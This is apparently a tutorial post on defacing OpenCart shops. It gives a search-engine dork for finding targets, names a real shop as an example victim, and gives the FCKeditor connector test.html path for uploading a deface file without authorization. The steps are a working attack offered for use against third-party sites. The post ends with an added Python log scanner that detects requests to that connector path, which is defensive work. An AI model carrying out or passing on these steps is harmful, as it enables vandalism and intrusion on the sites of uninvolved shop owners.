Dork: Powered By OpenCart site:com
The "site:" value can be anything, as long as the result runs OpenCart.
Example target: http://www.harleypartsintl.com/
It also works with a target such as www.target.com/patch/, that is, when the target you find has the shop under /patch/.
Example: http://www.target.com/patch/
Once you have a target, go straight to injecting the exploit.
Exploit path: admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
So it ends up like this:
Example: http://www.harleypartsintl.com/admin/vie.../test.html
If the target has /patch/, inject it after the /patch/ part.
Example: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Look at the page that comes up; it contains the file upload form.
For the connector, choose PHP.
Then upload our HTML deface file.
If it succeeds, an alert like this appears:
"file uploaded with no errors"
Check whether our file has been uploaded by clicking "Get Folders and Files".
Now look at the result.
Example result: http://www.harleypartsintl.com/h-n.html
Unfortunately, the uploaded file cannot overwrite an existing file; it is stored as a duplicate instead: file(1).html or file(2).html.
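A defender-side check for the path this post relies on, as an added example that is not part of the original post: it scans web server access logs for any request under the FCKeditor connectors directory, including shops installed in a subdirectory. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Directory from the post's exploit path; matched anywhere in the URL so a shop
# installed under a subdirectory (the post's /patch/ case) is covered too.
CONNECTOR_DIR = "fckeditor/editor/filemanager/connectors/"

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_connector_hits(lines):
    """Return {client_ip: [(timestamp, method, url, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        # Decode %xx escapes and fold case so trivial obfuscation still matches.
        url = unquote(m["url"]).lower()
        if CONNECTOR_DIR in url:
            hits[m["ip"]].append((m["ts"], m["method"], m["url"], int(m["status"])))
    return dict(hits)

def exposed(hits):
    """True if any connector request was answered 2xx (the page is served)."""
    return any(200 <= row[3] < 300 for rows in hits.values() for row in rows)

# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2024:10:02:13 +0000] "GET /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Jan/2024:11:15:00 +0000] "GET /patch/admin/view/javascript/%66ckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 404 196 "-" "curl/8.0"',
    'not an access log line',
]

if __name__ == "__main__":
    found = find_connector_hits(SAMPLE)
    for ip, rows in found.items():
        for ts, method, url, status in rows:
            print(f"{ts} {ip} {method} {url} -> {status}")
    print("connector reachable:", exposed(found))
```

A 2xx answer on this path means the connector test page is being served; deleting the file or denying web access to the connectors directory closes it.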